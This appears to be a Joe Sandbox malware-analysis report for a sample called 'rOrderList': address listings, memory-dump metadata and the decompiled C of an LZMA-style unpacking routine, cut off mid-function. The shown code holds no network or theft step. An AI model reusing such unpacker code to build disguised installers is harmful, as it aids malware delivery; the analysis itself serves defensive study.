                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00407343
                                                                                      0x004072ca
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x0040701c

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                                                                      • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                                                                                      • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                                                                      • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406F64() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						 *(_t613 - 0x84) = 0xa;
                                                                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x84) = 9;
                                                                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      					}
                                                                                      					while(1) {
                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                      						while(1) {
                                                                                      							L133:
                                                                                      							_t531 =  *_t606;
                                                                                      							_t589 = _t531 & 0x0000ffff;
                                                                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      							if( *(_t613 - 0xc) >= _t565) {
                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      								 *(_t613 - 0x40) = 1;
                                                                                      								_t532 = _t531 - (_t531 >> 5);
                                                                                      								 *_t606 = _t532;
                                                                                      							} else {
                                                                                      								 *(_t613 - 0x10) = _t565;
                                                                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      							}
                                                                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      								goto L139;
                                                                                      							}
                                                                                      							L137:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                      								L170:
                                                                                      								_t568 = 0x22;
                                                                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      								_t535 = 0;
                                                                                      								L172:
                                                                                      								return _t535;
                                                                                      							}
                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							L139:
                                                                                      							_t533 =  *(_t613 - 0x84);
                                                                                      							while(1) {
                                                                                      								 *(_t613 - 0x88) = _t533;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t534 =  *(_t613 - 0x88);
                                                                                      									if(_t534 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
                                                                                      										case 0:
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      											_t534 =  *( *(_t613 - 0x70));
                                                                                      											if(_t534 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t570);
                                                                                      											_push(9);
                                                                                      											_pop(_t571);
                                                                                      											_t609 = _t538 / _t570;
                                                                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                      											 *(_t613 - 0x3c) = _t604;
                                                                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t612 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t612 = _t612 - 1;
                                                                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      												} while (_t612 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											if( *(_t613 - 4) != 0) {
                                                                                      												GlobalFree( *(_t613 - 4));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t613 - 4) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												 *(_t613 - 0x88) = 1;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      											_t45 = _t613 - 0x48;
                                                                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t613 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											_t546 =  *(_t613 - 0x40);
                                                                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t613 - 0x48) = 5;
                                                                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											 *(_t613 - 0x74) = _t546;
                                                                                      											if( *(_t613 - 8) != 0) {
                                                                                      												GlobalFree( *(_t613 - 8));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      											 *(_t613 - 8) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      											 *(_t613 - 0x84) = 6;
                                                                                      											 *(_t613 - 0x4c) = _t553;
                                                                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                      											 *(_t613 - 0x54) = _t606;
                                                                                      											goto L133;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												 *(_t613 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											_t67 = _t613 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      											if( *(_t613 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t531 =  *_t606;
                                                                                      											_t589 = _t531 & 0x0000ffff;
                                                                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      											if( *(_t613 - 0xc) >= _t565) {
                                                                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      												 *(_t613 - 0x40) = 1;
                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                      												 *_t606 = _t532;
                                                                                      											} else {
                                                                                      												 *(_t613 - 0x10) = _t565;
                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      											}
                                                                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											goto L137;
                                                                                      										case 6:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											while(1) {
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											}
                                                                                      										case 8:
                                                                                      											goto L0;
                                                                                      										case 9:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L89;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t258;
                                                                                      											0 | _t258 = _t258 + _t258 + 9;
                                                                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      											goto L75;
                                                                                      										case 0xa:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L88;
                                                                                      										case 0xb:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L88:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L89:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L99:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t334 = __ebp - 0x70;
                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t334;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L101;
                                                                                      										case 0xd:
                                                                                      											L37:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
